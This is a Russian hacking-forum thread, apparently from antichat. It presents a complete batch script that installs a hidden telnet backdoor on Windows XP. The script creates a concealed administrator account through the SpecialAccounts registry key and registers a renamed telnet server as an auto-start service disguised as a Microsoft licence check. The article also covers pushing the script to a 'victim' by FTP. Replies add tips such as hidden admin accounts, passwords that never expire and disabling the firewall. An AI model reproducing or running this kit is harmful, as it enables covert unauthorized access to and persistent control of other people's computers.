Скрытый telnet доступ к Windows ]INTRO[ Данная статья предназначена для пользователей умеющих пользоваться консолью и знающих о telnet'е. Всё приведйнное ниже тестилось на машинах под управлением операционной системы Windows XP SP2. ]MENU[ 1,2. Для тех, кто имеет доступ к машине. 2. Для впаривающих. 3. Развязка ]START[ 1. Нам нужно паписать батник, в котором прописываются все параметры будущего телнета. Вот собсно и он, run.bat (в архиве): chcp 1251 net user SUPPORT_388945a0 /delete net user SUPPORT_388945a0 pas /add net localgroup "Администраторы" SUPPORT_388945a0 /add net localgroup "Пользователи" SUPPORT_388945a0 /del copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" ECHO Windows Registry Editor Version 5.00>>user.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>user.reg ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg regedit /s user.reg && DEL user.reg sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." tlntadmn config port=1451 sec=-NTLM net start "Проверка подлинности Microsoft Windows" Расшифровываю: chcp 1251 - переходим на 1251 кодировку, без этого не как, иначе нужно будет перекодировать в досовскую кодировку, например группа "Администраторы" будет такова "Ђ¤¬Ё*Ёбва*в®ал". net user SUPPORT_388945a0 /delete - удаляем стандартного скрытого юзверя. net user SUPPORT_388945a0 pas /add - добавляем его-же, только каплю подделаем его под себя. pas - вместо этого нужно ввести пароль. net localgroup "Администраторы" SUPPORT_388945a0 /add - добавляем юзверя SUPPORT_388945a0 в группу "Администраторы". net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах). copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" - Берёт стандартный файл сервера tlntsvr.exe, копирует его в ту же директорию, только уже под другим именем (tlntsevr.exe). ECHO Windows Registry Editor Version 5.00>>user.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>user.reg ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg regedit /s user.reg && DEL user.reg - изменение реестра, сначала воспроизводится написанное, за тем импортируется в реестр. SUPPORT_388945a0 - данный юзверь сдесь скрывается от посторонних глаз, т.е. не будет отображаться во время входа в систему, при просмотре пользователей через панель управления и т.д. (конец в ветке "UserList" без пробелов! почему-то исправляется...). sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP - создаём службу, %windir%\system32\tlntsevr.exe - путь до файла сервера телнета, "Проверка подлинности Microsoft Windows" - название службы. sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." - её описание. tlntadmn config port=1451 sec=-NTLM - порт 1451 net start "Проверка подлинности Microsoft Windows" - старт службы 2. Вот мы зашли на машину через некий telnet или его подобие, переходим в любую директорию. На своей машине запускаем ftp сервер, например Pablos ftp server (в архиве), переходим во вкладку User Accounts, там всё интуетивно понятно, указываем дынные для конекта. В консили переходим в нужную директорию, за тем пишем: ------------ Способ 1. ------------ ftp open 111.111.111.111 SUPPORT_388945a0 pas get run.bat bye "run.bat" ftp - угадайте что open 111.111.111.111 - открыть ип 111.111.111.111 (ваш ип). SUPPORT_388945a0 - логин пользователя. pas - пароль. get run.bat - отправить наш батник. bye - выйти из ftp "run.bat" - запустить батник (при нужде вводим путь). ------------ Способ 2. Тут нам вообще не нужен ftp и вообще на много меньше мороки, но всеравно, попробуйте и первым способом. ------------ Копируем код батника, маус 2 в консоли, волшебный пункт "Вставить" (у кого-то Past ), жмём Enter и всё)) Ну да, да...очень сложно... но первый способ всеравно попробуйте)) 3. Ну и самое интересное и долгожданное: Вводим в консоль: telnet 222.222.222.222 1451 222.222.222.222 - ип жертвы 1451 - порт Хотя зачем это разъяснять, если вы умееть пользоваться телнетом, но вдруг кто-то уже забыл). Что бы создать .exe юзаем программу "Bat To Exe Converter" (в архиве). Архив к статье: http://depositfiles.com/files/7783083 (537.94Kb). п.с. подобная статья на этой ветке от StG-44 с его взглядом на телнет http://forum.antichat.ru/thread68300.html
Орфография хромает. Правильно будет писать - подлинности. Вот я если увидел у себя такую надпись, то сразу же почуял бы неладное. В целом норм.
>>>net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах). Вообще глупое действие
Вы что, вообще охр**ели? Уже удалили 3 подобных статьи от Giviona (линк ниже) Называется, найдите 10 отличий - http://www.hackzona.ru/hz.php?name=News&file=article&sid=8820
Стандартный же юзверь под этим именем не в двух группах учавствует, вот мы и прикроем этого, что бы не вызывать подозрений
мля писалось 100 раз но мне очень нравиться такие статьи подробные! Сам такие примерно пишу на досуге. Респект вообщем) Добавляю Скрытые пользователи храняться тут...... (там все юзеры и админы +еще и скрытые) C:\WINDOWS\system32\lusrmgr.exe может кому понадобиться для всяких пакостей)))
Во-первых, .msc (не .exe). Во-вторых, это просто оснастка консоли управления, в ней самой ни черта не хранится. В-третьих, для сеанса telnet такое не подойдёт.
хм..... я сам не знал что это не exe потому что лень смотреть но так все программы обладают exe =-) Во вторых я имел ввиду что через нее можно все делать с юзерами (ПС вот че ты так придираешься?) В третих я разве чтото упоминал о телнете??? пздц какой то народ какой пошол
|: netstat -an УУУУУХ ТЫ ПРюВЕТ ПОРТ ЧЕТЫРНАДЦАТЬПЕТДЕСЯТОДИН!!!11 зы: я только один прочитал это? подключение по телнету НЕ занимает канал обычного телнета а чей канал тогда занимает ftp ? зыы: а може это телепатнет? HTML: telepatnet > open 192.168.0.1 1451 [ но так шоб беспаливна! ]
есть проблемка - доступ к удаленному компу есть. поднял на нем телнет доступ. подрубаюсь спокойно к компу. тасклист могу смотреть. но не могу запустить ни одной проги. каждый раз пишет This program cannot be run in DOS mode. пробывал просто написать имя файла или через start - результат одинаков. хотя на удаленной машине стоит винда.
Создай какой нить батник ) ну типа echo "start proga.exe" >> 1.bat , ну а потом запусти батник , мож прокатит ЗЫ : Темы про батники уже достали...
А если создать акк свой net user pidor 123 /add net localgroup Administrators pidor /add и в реестр добавить в ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList pidor dword:00000000 то будет беспалевно? Эту учетку админ не увидит?
1) Не видно будет в Welcome-screen, через администрирование - ясен пень видно. 2) Не забудьте поставить "срок действия пароля не ограничен" (это для тех, кто собирается постоянно лазить на комп жертвы). 3) Также полезно отключить хотя бы базовый файерволл.
